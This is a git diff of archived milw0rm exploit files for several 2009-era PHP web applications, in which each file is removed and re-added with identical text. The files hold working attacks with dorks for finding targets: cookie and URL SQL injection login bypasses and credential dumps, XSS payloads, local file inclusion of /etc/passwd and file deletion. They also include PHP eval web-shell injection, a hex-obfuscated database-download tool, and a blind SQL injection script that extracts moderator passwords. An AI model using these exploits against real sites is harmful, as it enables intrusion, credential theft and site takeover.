diff --git a/platforms/php/webapps/9063.txt b/platforms/php/webapps/9063.txt index d15145004..e68ec0097 100755 --- a/platforms/php/webapps/9063.txt +++ b/platforms/php/webapps/9063.txt @@ -1,17 +1,17 @@ -# Messages Library 2.0 <= Arbitrary Database Download Vulnerability -######################################## -#[*] Founded & Exploited by : Stack -######################################## - -Bypass with - -javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/"; -javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/"; - -After Exec - -http://localhost/sms/admin/backup.php - -and you got the database download - -# milw0rm.com [2009-07-01] +# Messages Library 2.0 <= Arbitrary Database Download Vulnerability +######################################## +#[*] Founded & Exploited by : Stack +######################################## + +Bypass with + +javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/"; +javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/"; + +After Exec + +http://localhost/sms/admin/backup.php + +and you got the database download + +# milw0rm.com [2009-07-01] diff --git a/platforms/php/webapps/9068.txt b/platforms/php/webapps/9068.txt index c07419c66..4b9c72759 100755 --- a/platforms/php/webapps/9068.txt +++ b/platforms/php/webapps/9068.txt 
@@ -1,110 +1,110 @@ -dork: "Copyright KerviNet" -eLwaux(c) 20.06.2009 - -## ## ## ## -Blind SQLinj -/index.php -------------------------------------------------------------------------------------------------- -if($_COOKIE['user_enter']=="auto") { -$enter_login=$_COOKIE['enter_login']; -$enter_parol=$_COOKIE['enter_parol']; -$mysql->query("SELECT name, pass, status FROM users WHERE name = -'".$enter_login."' AND pass = '".$enter_parol."'"); -------------------------------------------------------------------------------------------------- -exploit: - COOKIE: user_enter=auto - COOKIE: enter_login = abc - COOKIE: enter_parol = ' or name = (select name from users where -id_user=1) and '1'='1'; - sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc' -AND pass = '' or name = (select name from users where id_user<10 limit -1) -и вы автоматом зайдете под админом, даже не зная его имени (: - - - -## ## ## ## -SQLinj -/message.php -------------------------------------------------------------------------------------------------- -9: $topic=$_GET['topic']; -18: if($topic) { -69: $mysql->query("SELECT name, viewing, voting, status, top_status, -id_forum FROM topics WHERE id_topic = ".$topic); -exploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users -------------------------------------------------------------------------------------------------- - - -## ## ## ## -SiXSS -/message.php -exploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users - - -## ## ## ## -aXSS -/add_voting.php -------------------------------------------------------------------------------------------------- -22: $topic=$_GET['topic']; -61: if($topic) { -66: $forum_edit->add_voting($time, $topic, $v_vopros, $variants); -74: } - -function add_voting($time, $topic, $v_vopros, $variants) { -global $user; -global $user_ip; -if($user) { -global $mysql; -$mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic); 
-$mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."', ".$topic.")"); -$id_vname=mysql_insert_id(); -for($i=0; $iquery("INSERT INTO v_variants VALUES (".$vr_nom.", -'".$variants[$i]."', ".$id_vname.")"); -} -} -return $id_vname; -} -------------------------------------------------------------------------------------------------- - -exploit:/add_voting.php?topic=1 - POST: add_voting = ok_add - POST: v_vopros = v - POST: v_variant1 = {XSS} - POST: v_variant2 = v2 - - -## ## ## ## -users deleating -/admin/edit_user.php -------------------------------------------------------------------------------------------------- -$del_user_id=$_POST['del_user_id']; -$mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id); -------------------------------------------------------------------------------------------------- -exploit: - POST: del_user_id=(select user_id from users limit 1) - - -## ## ## ## -Path Disclosure -------------------------------------------------------------------------------------------------- -/include_files/voting_diagram.php -/include_files/voting.php -/include_files/topics_search.php -/include_files/topics_list.php -/include_files/top_part.php -/include_files/quick_search.php -/include_files/quick_reply.php -/include_files/moder_menu.php -/include_files/messages_list.php -/include_files/menu.php -/include_files/head.php -/include_files/forums_list.php -/include_files/forum_statistics.php -/include_files/forum_info.php -/include_files/birthday.php -/admin/head.php -------------------------------------------------------------------------------------------------- - -# milw0rm.com [2009-07-01] +dork: "Copyright KerviNet" +eLwaux(c) 20.06.2009 + +## ## ## ## +Blind SQLinj +/index.php +------------------------------------------------------------------------------------------------- +if($_COOKIE['user_enter']=="auto") { +$enter_login=$_COOKIE['enter_login']; +$enter_parol=$_COOKIE['enter_parol']; +$mysql->query("SELECT name, pass, status FROM 
users WHERE name = +'".$enter_login."' AND pass = '".$enter_parol."'"); +------------------------------------------------------------------------------------------------- +exploit: + COOKIE: user_enter=auto + COOKIE: enter_login = abc + COOKIE: enter_parol = ' or name = (select name from users where +id_user=1) and '1'='1'; + sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc' +AND pass = '' or name = (select name from users where id_user<10 limit +1) +и вы автоматом зайдете под админом, даже не зная его имени (: + + + +## ## ## ## +SQLinj +/message.php +------------------------------------------------------------------------------------------------- +9: $topic=$_GET['topic']; +18: if($topic) { +69: $mysql->query("SELECT name, viewing, voting, status, top_status, +id_forum FROM topics WHERE id_topic = ".$topic); +exploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users +------------------------------------------------------------------------------------------------- + + +## ## ## ## +SiXSS +/message.php +exploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users + + +## ## ## ## +aXSS +/add_voting.php +------------------------------------------------------------------------------------------------- +22: $topic=$_GET['topic']; +61: if($topic) { +66: $forum_edit->add_voting($time, $topic, $v_vopros, $variants); +74: } + +function add_voting($time, $topic, $v_vopros, $variants) { +global $user; +global $user_ip; +if($user) { +global $mysql; +$mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic); +$mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."', ".$topic.")"); +$id_vname=mysql_insert_id(); +for($i=0; $iquery("INSERT INTO v_variants VALUES (".$vr_nom.", +'".$variants[$i]."', ".$id_vname.")"); +} +} +return $id_vname; +} +------------------------------------------------------------------------------------------------- + +exploit:/add_voting.php?topic=1 + POST: 
add_voting = ok_add + POST: v_vopros = v + POST: v_variant1 = {XSS} + POST: v_variant2 = v2 + + +## ## ## ## +users deleating +/admin/edit_user.php +------------------------------------------------------------------------------------------------- +$del_user_id=$_POST['del_user_id']; +$mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id); +------------------------------------------------------------------------------------------------- +exploit: + POST: del_user_id=(select user_id from users limit 1) + + +## ## ## ## +Path Disclosure +------------------------------------------------------------------------------------------------- +/include_files/voting_diagram.php +/include_files/voting.php +/include_files/topics_search.php +/include_files/topics_list.php +/include_files/top_part.php +/include_files/quick_search.php +/include_files/quick_reply.php +/include_files/moder_menu.php +/include_files/messages_list.php +/include_files/menu.php +/include_files/head.php +/include_files/forums_list.php +/include_files/forum_statistics.php +/include_files/forum_info.php +/include_files/birthday.php +/admin/head.php +------------------------------------------------------------------------------------------------- + +# milw0rm.com [2009-07-01] diff --git a/platforms/php/webapps/9069.txt b/platforms/php/webapps/9069.txt index 8a22c6155..887ab3358 100755 --- a/platforms/php/webapps/9069.txt +++ b/platforms/php/webapps/9069.txt 
@@ -1,138 +1,138 @@ -CMS Chainuk <= v.1.2 Vulns -Home: Cms.tut.su -Dork: "Cms.tut.su, 2009 g." - -eLwaux(c) 14.06.2 - - -## ## ## ## ## ## - -LFI -/index.php ---------------------------------------------------------------------------- -6: if (isset($_GET ['id'])) -7: { -8: [color=white]$id = $_GET ['id'];[/color] -9: } -10: else -11: { -12: $id = $index; -13: } -14: if (file_exists ("content/" . $id . ".php")) -15: { -16: [color=white]include ("content/" . $id . ".php");[/color] -17: } -18: else -19: { -20: include ('404.html'); exit; -21: } --------------------------------------------------------------------------- - -exploit: - index.php?id=../../../../etc/passwd%00 - - -## ## ## ## ## ## - -LFI -/admin/admin_edit.php ---------------------------------------------------------------------------- -2: if (isset($_GET['id'])) -3: { -4: [color=white]$id = $_GET['id'];[/color] -5: if (!file_exists("../content/" . $id . ".php")) die (".."); -6: [color=white]include("../content/" . $id . ".php");[/color] -23: } ------------------------------------------------------------------------------ - -exploit: - index.php?id=../../../../etc/passwd%00 - - -## ## ## ## ## ## - -delete any files () -/admin/admin_delete.php[ ---------------------------------------------------------------------------- -3: if([color=white]unlink('../content/'.$_GET['id'].'.php')[/color]) -4: { -5: echo 'Page '.$_GET['id'].' deleted';[/code] ------------------------------------------------------------------------------ - -exploit: - /admin/admin_delete.php?id=../FILE.PHP%00 - - -## ## ## ## ## ## - -LFI / XSS / Shell -/admin/admin_menu.php ------------------------------------------------------------------------------ -37: $menu = explode (',', $_POST['menu']); -38: $csvcont =''; -39: foreach ($menu as $a) -40: { -41: if (!preg_match("/[0-9]/", $a)) die ("error"); -42: if (!file_exists("../content/" . $a . ".php")) die ("error"); -43: [color=white]include ("../content/" . $a . 
".php");[/color] -44: $csvcont = $csvcont . $a . ";" . $page_4menu . "\n"; -45: } -65: if (!file_put_contents("../menu.csv", $csvcont)) .. ------------------------------------------------------------------------------ - -exploits: - LFI POST: menu=../1/../FILE.PHP%00,1,2,3,4,5,6,7 - XSS POST: menu=../1../onmousemove="javascript:alert(document.cookies)">>/../index;,1,2,3,4,5,6,7 - Shell: if POST: menu=../1 -/../admin/passw,1,2,3,4,5,6,7 - /?id=../menu.csv%00&a=phpinfo();[/CoDE] - - -## ## ## ## ## ## - -Shell -/admin_settings.php ------------------------------------------------------------------------------ -39: if (!isset($_POST['tmpl']) || !isset($_POST['id']) || -!isset($_POST['menu'])) -40: { -41: die ("..."); -42: } -43: if (!file_exists("../templates/" . $_POST['tmpl'] . -"/index.php")) die ("..."); -44: if (!file_exists("../content/" . $_POST['id'] . ".php")) die ("..."); -45: $mtpl = $_POST['menu']; -46: $set = ""; -63: if (!file_put_contents("../settings.php", $set) ------------------------------------------------------------------------------ - -exploit: - POST: action=abc - tmpl=default - id=1 - menu=%TITLE%"; @eval($_GET["a"]); ?> //[/code] -Shell: /settings.php?a=phpinfo(); - - -## ## ## ## ## ## - -Shell -/admin_new.php ------------------------------------------------------------------------------ -POST: action=abc - text=abc - title='; @eval($_GET[a]); // - descr=abc - keys=abc - link=abc[/code] -/content/=NUMBER.php?a=phpinfo(); - - -## ## ## ## ## ## - -Path Disclosure - /index.php?id=../admin/passw - /admin/admin_delete.php?id=thisf0ld3risn0texi5s5 - -# milw0rm.com [2009-07-01] +CMS Chainuk <= v.1.2 Vulns +Home: Cms.tut.su +Dork: "Cms.tut.su, 2009 g." 
+ +eLwaux(c) 14.06.2 + + +## ## ## ## ## ## + +LFI +/index.php +--------------------------------------------------------------------------- +6: if (isset($_GET ['id'])) +7: { +8: [color=white]$id = $_GET ['id'];[/color] +9: } +10: else +11: { +12: $id = $index; +13: } +14: if (file_exists ("content/" . $id . ".php")) +15: { +16: [color=white]include ("content/" . $id . ".php");[/color] +17: } +18: else +19: { +20: include ('404.html'); exit; +21: } +-------------------------------------------------------------------------- + +exploit: + index.php?id=../../../../etc/passwd%00 + + +## ## ## ## ## ## + +LFI +/admin/admin_edit.php +--------------------------------------------------------------------------- +2: if (isset($_GET['id'])) +3: { +4: [color=white]$id = $_GET['id'];[/color] +5: if (!file_exists("../content/" . $id . ".php")) die (".."); +6: [color=white]include("../content/" . $id . ".php");[/color] +23: } +----------------------------------------------------------------------------- + +exploit: + index.php?id=../../../../etc/passwd%00 + + +## ## ## ## ## ## + +delete any files () +/admin/admin_delete.php[ +--------------------------------------------------------------------------- +3: if([color=white]unlink('../content/'.$_GET['id'].'.php')[/color]) +4: { +5: echo 'Page '.$_GET['id'].' deleted';[/code] +----------------------------------------------------------------------------- + +exploit: + /admin/admin_delete.php?id=../FILE.PHP%00 + + +## ## ## ## ## ## + +LFI / XSS / Shell +/admin/admin_menu.php +----------------------------------------------------------------------------- +37: $menu = explode (',', $_POST['menu']); +38: $csvcont =''; +39: foreach ($menu as $a) +40: { +41: if (!preg_match("/[0-9]/", $a)) die ("error"); +42: if (!file_exists("../content/" . $a . ".php")) die ("error"); +43: [color=white]include ("../content/" . $a . ".php");[/color] +44: $csvcont = $csvcont . $a . ";" . $page_4menu . 
"\n"; +45: } +65: if (!file_put_contents("../menu.csv", $csvcont)) .. +----------------------------------------------------------------------------- + +exploits: + LFI POST: menu=../1/../FILE.PHP%00,1,2,3,4,5,6,7 + XSS POST: menu=../1../onmousemove="javascript:alert(document.cookies)">>/../index;,1,2,3,4,5,6,7 + Shell: if POST: menu=../1 +/../admin/passw,1,2,3,4,5,6,7 + /?id=../menu.csv%00&a=phpinfo();[/CoDE] + + +## ## ## ## ## ## + +Shell +/admin_settings.php +----------------------------------------------------------------------------- +39: if (!isset($_POST['tmpl']) || !isset($_POST['id']) || +!isset($_POST['menu'])) +40: { +41: die ("..."); +42: } +43: if (!file_exists("../templates/" . $_POST['tmpl'] . +"/index.php")) die ("..."); +44: if (!file_exists("../content/" . $_POST['id'] . ".php")) die ("..."); +45: $mtpl = $_POST['menu']; +46: $set = ""; +63: if (!file_put_contents("../settings.php", $set) +----------------------------------------------------------------------------- + +exploit: + POST: action=abc + tmpl=default + id=1 + menu=%TITLE%"; @eval($_GET["a"]); ?> //[/code] +Shell: /settings.php?a=phpinfo(); + + +## ## ## ## ## ## + +Shell +/admin_new.php +----------------------------------------------------------------------------- +POST: action=abc + text=abc + title='; @eval($_GET[a]); // + descr=abc + keys=abc + link=abc[/code] +/content/=NUMBER.php?a=phpinfo(); + + +## ## ## ## ## ## + +Path Disclosure + /index.php?id=../admin/passw + /admin/admin_delete.php?id=thisf0ld3risn0texi5s5 + +# milw0rm.com [2009-07-01] diff --git a/platforms/php/webapps/907.pl b/platforms/php/webapps/907.pl index f9af417b9..cbac79b4c 100755 --- a/platforms/php/webapps/907.pl +++ b/platforms/php/webapps/907.pl @@ -67,6 +67,6 @@ while ($answer = <$socket>) } if ($success==0) {print " [-] Exploit failed\n";} -## EOF ## - -# milw0rm.com [2005-04-02] +## EOF ## + +# milw0rm.com [2005-04-02] 
diff --git a/platforms/php/webapps/9073.php b/platforms/php/webapps/9073.php index 4abbf044a..604a7c132 100755 --- a/platforms/php/webapps/9073.php +++ b/platforms/php/webapps/9073.php 
@@ -1,27 +1,27 @@ - exploit : YourTube <= 2.0 Remote SQL Database Disclosure -//=> info : http://www.ac4p.com -//=> DORK: "powered by yourtube" -//=> found by: Security Code Team - thanks for sniper code and Qabandi -- -//=> our home: WwW.Sec-Code.com -//=> greats 4 our members in our home -- -/// -// - Upload this file to Apache server and fill victim site in the feild - -// - press the button to download the database - -// - copy admin information [ hash passwd -username-userid] :) -// -now use the cookies to enter admin cp - go here => http://victim.com/path/cp -- and put there information -// - one by one --like this for example javascript:document.cookie="username=admin"; -// javascript:document.cookie="password=9662183a3e621d636cb373f6e18a8f04"; -// javascript:document.cookie="user_id=1"; -// -// \reload the page and you will be admin / -// -// pease -- visit us www.sec-code.com -- -if (isset($_GET['Qabandi'])) { - echo "\x3C\x66\x6F\x72\x6D\x20\x6E\x61\x6D\x65\x3D\x27\x66\x6F\x72\x6D\x77\x27\x20\x6D\x65\x74\x68\x6F\x64\x3D\x27\x70\x6F\x73\x74\x27\x20\x61\x63\x74\x69\x6F\x6E\x3D'". 
$_POST[victim] ."\x2F\x63\x70\x2F\x62\x61\x63\x6B\x75\x70\x2E\x70\x68\x70\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x6E\x61\x6D\x65\x3D\x27\x61\x63\x74\x69\x6F\x6E\x27\x20\x74\x79\x70\x65\x3D\x27\x68\x69\x64\x64\x65\x6E\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x79\x65\x73\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x68\x69\x64\x64\x65\x6E\x27\x20\x6E\x61\x6D\x65\x3D\x27\x74\x61\x62\x6C\x65\x6E\x5B\x5D\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x61\x63\x34\x70\x63\x6F\x6D\x5F\x75\x73\x65\x72\x73\x27\x20\x63\x68\x65\x63\x6B\x65\x64\x3D\x27\x63\x68\x65\x63\x6B\x65\x64\x27\x20\x2F\x3E\x3C\x2F\x74\x64\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x27\x20\x6E\x61\x6D\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x32\x27\x20\x63\x6C\x61\x73\x73\x3D\x27\x62\x75\x74\x74\x6F\x6E\x73\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x47\x65\x74\x20\x61\x63\x34\x70\x63\x6F\x6D\x5F\x75\x73\x65\x72\x73\x27\x20\x2F\x3E\x3C\x2F\x66\x6F\x72\x6D\x3E"; -} else{ - echo "\x3C\x66\x6F\x72\x6D\x20\x6E\x61\x6D\x65\x3D\x27\x66\x6F\x72\x6D\x31\x27\x20\x65\x6E\x63\x74\x79\x70\x65\x3D\x27\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61\x27\x20\x61\x63\x74\x69\x6F\x6E\x3D\x27". 
$PHP_SELF ."\x3F\x51\x61\x62\x61\x6E\x64\x69\x3D\x31\x27\x20\x6D\x65\x74\x68\x6F\x64\x3D\x27\x70\x6F\x73\x74\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x27\x20\x73\x69\x7A\x65\x3D\x27\x32\x35\x27\x20\x6E\x61\x6D\x65\x3D\x27\x76\x69\x63\x74\x69\x6D\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x56\x49\x43\x54\x49\x4D\x2F\x53\x43\x52\x49\x50\x54\x2F\x27\x20\x2F\x3E\x3C\x62\x72\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x27\x20\x6E\x61\x6D\x65\x3D\x27\x71\x75\x62\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x4E\x65\x78\x74\x27\x3E"; -} -?> - -# milw0rm.com [2009-07-02] + exploit : YourTube <= 2.0 Remote SQL Database Disclosure +//=> info : http://www.ac4p.com +//=> DORK: "powered by yourtube" +//=> found by: Security Code Team - thanks for sniper code and Qabandi -- +//=> our home: WwW.Sec-Code.com +//=> greats 4 our members in our home -- +/// +// - Upload this file to Apache server and fill victim site in the feild - +// - press the button to download the database - +// - copy admin information [ hash passwd -username-userid] :) +// -now use the cookies to enter admin cp - go here => http://victim.com/path/cp -- and put there information +// - one by one --like this for example javascript:document.cookie="username=admin"; +// javascript:document.cookie="password=9662183a3e621d636cb373f6e18a8f04"; +// javascript:document.cookie="user_id=1"; +// +// \reload the page and you will be admin / +// +// pease -- visit us www.sec-code.com -- +if (isset($_GET['Qabandi'])) { + echo "\x3C\x66\x6F\x72\x6D\x20\x6E\x61\x6D\x65\x3D\x27\x66\x6F\x72\x6D\x77\x27\x20\x6D\x65\x74\x68\x6F\x64\x3D\x27\x70\x6F\x73\x74\x27\x20\x61\x63\x74\x69\x6F\x6E\x3D'". 
$_POST[victim] ."\x2F\x63\x70\x2F\x62\x61\x63\x6B\x75\x70\x2E\x70\x68\x70\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x6E\x61\x6D\x65\x3D\x27\x61\x63\x74\x69\x6F\x6E\x27\x20\x74\x79\x70\x65\x3D\x27\x68\x69\x64\x64\x65\x6E\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x79\x65\x73\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x68\x69\x64\x64\x65\x6E\x27\x20\x6E\x61\x6D\x65\x3D\x27\x74\x61\x62\x6C\x65\x6E\x5B\x5D\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x61\x63\x34\x70\x63\x6F\x6D\x5F\x75\x73\x65\x72\x73\x27\x20\x63\x68\x65\x63\x6B\x65\x64\x3D\x27\x63\x68\x65\x63\x6B\x65\x64\x27\x20\x2F\x3E\x3C\x2F\x74\x64\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x27\x20\x6E\x61\x6D\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x32\x27\x20\x63\x6C\x61\x73\x73\x3D\x27\x62\x75\x74\x74\x6F\x6E\x73\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x47\x65\x74\x20\x61\x63\x34\x70\x63\x6F\x6D\x5F\x75\x73\x65\x72\x73\x27\x20\x2F\x3E\x3C\x2F\x66\x6F\x72\x6D\x3E"; +} else{ + echo "\x3C\x66\x6F\x72\x6D\x20\x6E\x61\x6D\x65\x3D\x27\x66\x6F\x72\x6D\x31\x27\x20\x65\x6E\x63\x74\x79\x70\x65\x3D\x27\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61\x27\x20\x61\x63\x74\x69\x6F\x6E\x3D\x27". $PHP_SELF ."\x3F\x51\x61\x62\x61\x6E\x64\x69\x3D\x31\x27\x20\x6D\x65\x74\x68\x6F\x64\x3D\x27\x70\x6F\x73\x74\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x27\x20\x73\x69\x7A\x65\x3D\x27\x32\x35\x27\x20\x6E\x61\x6D\x65\x3D\x27\x76\x69\x63\x74\x69\x6D\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x56\x49\x43\x54\x49\x4D\x2F\x53\x43\x52\x49\x50\x54\x2F\x27\x20\x2F\x3E\x3C\x62\x72\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x27\x20\x6E\x61\x6D\x65\x3D\x27\x71\x75\x62\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x4E\x65\x78\x74\x27\x3E"; +} +?> + +# milw0rm.com [2009-07-02] diff --git a/platforms/php/webapps/9075.txt b/platforms/php/webapps/9075.txt index 41950c12d..798c41495 100755 
--- a/platforms/php/webapps/9075.txt +++ b/platforms/php/webapps/9075.txt @@ -1,19 +1,19 @@ -######################################################################### -[+] AdminLog 0.5 Login Bypass Vulnerability -[+] Discovered By SirGod -[+] http://insecurity-ro.org -[+] http://h4cky0u.org -[+] down: http://www.manlyfamily.net/wiki/doku.php?id=programming:php:adminlog -######################################################################### - -[+] Login Bypass - - - Conditions : register_globals = ON - - - PoC - - http://127.0.0.1/[path]/adminlog.php?valid_login=1&loggedInUser=[VALIDUSER] - -######################################################################### - -# milw0rm.com [2009-07-02] +######################################################################### +[+] AdminLog 0.5 Login Bypass Vulnerability +[+] Discovered By SirGod +[+] http://insecurity-ro.org +[+] http://h4cky0u.org +[+] down: http://www.manlyfamily.net/wiki/doku.php?id=programming:php:adminlog +######################################################################### + +[+] Login Bypass + + - Conditions : register_globals = ON + + - PoC + + http://127.0.0.1/[path]/adminlog.php?valid_login=1&loggedInUser=[VALIDUSER] + +######################################################################### + +# milw0rm.com [2009-07-02] diff --git a/platforms/php/webapps/9076.php b/platforms/php/webapps/9076.php index 5aad18a64..6f6d4bdbb 100755 --- a/platforms/php/webapps/9076.php +++ b/platforms/php/webapps/9076.php 
@@ -1,201 +1,201 @@ - 2) { - -echo "\nPlease wait, this will take time, el9abr zain ;)\n"; -$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1")); -echo "\nExploiting:\n"; -$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0")); -$t = abs((100-($w/$r*100))); -echo "Username: "; -for ($i=1; $i <= 30; $i++) { - - $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$i.",1))!='0"); - -$laenge = strlen($q); - if (abs((100-($laenge/$r*100))) > $t-1) { - $count = $i; - $i = 30; - } -} -for ($j = 1; $j < $count; $j++) { - for ($i = 46; $i <= 122; $i=$i+2) { - if ($i == 60) { - $i = 98; - } - - - if ($j>9){ - $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".$i)); - } - - if ($j<=9){ - $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".$i)); - - } - - - - if (abs((100-($laenge/$r*100))) > $t-1) { - - - if ($j>9){ - $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1))); - } - if ($j<=9){ - $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1))); - - } - - - - - - if (abs((100-($laenge/$r*100))) > $t-1) { - echo chr($i-1); - } else { - echo chr($i); - } - $i = 122; - } - } -} -echo "\nPassword: "; -for ($j = 1; $j <= 49; $j++) { - for ($i = 46; $i <= 102; $i=$i+2) { - if ($i == 60) { - $i = 98; - } - - - if ($j>9){ - - $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".$i); - - - } - - if ($j<=9){ - - 
$hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".$i); - - - } - - - $laenge = strlen($hg); - - if (abs((100-($laenge/$r*100))) > $t-1) { - - - if ($j>9){ - - $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1))); - } - - if ($j<=9){ - - $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1))); - } - - - - if (abs((100-($laenge/$r*100))) > $t-1) { - echo chr($i-1); - } else { - echo chr($i); - } - $i = 102; - } - } -} -} -?> - -# milw0rm.com [2009-07-02] + 2) { + +echo "\nPlease wait, this will take time, el9abr zain ;)\n"; +$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1")); +echo "\nExploiting:\n"; +$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0")); +$t = abs((100-($w/$r*100))); +echo "Username: "; +for ($i=1; $i <= 30; $i++) { + + $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$i.",1))!='0"); + +$laenge = strlen($q); + if (abs((100-($laenge/$r*100))) > $t-1) { + $count = $i; + $i = 30; + } +} +for ($j = 1; $j < $count; $j++) { + for ($i = 46; $i <= 122; $i=$i+2) { + if ($i == 60) { + $i = 98; + } + + + if ($j>9){ + $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".$i)); + } + + if ($j<=9){ + $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".$i)); + + } + + + + if (abs((100-($laenge/$r*100))) > $t-1) { + + + if ($j>9){ + $laenge = 
strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1))); + } + if ($j<=9){ + $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1))); + + } + + + + + + if (abs((100-($laenge/$r*100))) > $t-1) { + echo chr($i-1); + } else { + echo chr($i); + } + $i = 122; + } + } +} +echo "\nPassword: "; +for ($j = 1; $j <= 49; $j++) { + for ($i = 46; $i <= 102; $i=$i+2) { + if ($i == 60) { + $i = 98; + } + + + if ($j>9){ + + $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".$i); + + + } + + if ($j<=9){ + + $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".$i); + + + } + + + $laenge = strlen($hg); + + if (abs((100-($laenge/$r*100))) > $t-1) { + + + if ($j>9){ + + $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1))); + } + + if ($j<=9){ + + $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1))); + } + + + + if (abs((100-($laenge/$r*100))) > $t-1) { + echo chr($i-1); + } else { + echo chr($i); + } + $i = 102; + } + } +} +} +?> + +# milw0rm.com [2009-07-02] diff --git a/platforms/php/webapps/9077.txt b/platforms/php/webapps/9077.txt index 70c0049fc..aa261621e 100755 --- a/platforms/php/webapps/9077.txt +++ b/platforms/php/webapps/9077.txt 
@@ -1,36 +1,36 @@
-########################################################################################################################
-#conpresso 3.4.8 (detail.php) Remote Blind SQL Injection Exploit
-#=======================================================================================================================
-#
-#Critical Level : Dangerous
-#
-#Vendor site : http://www.conpresso.de/
-#
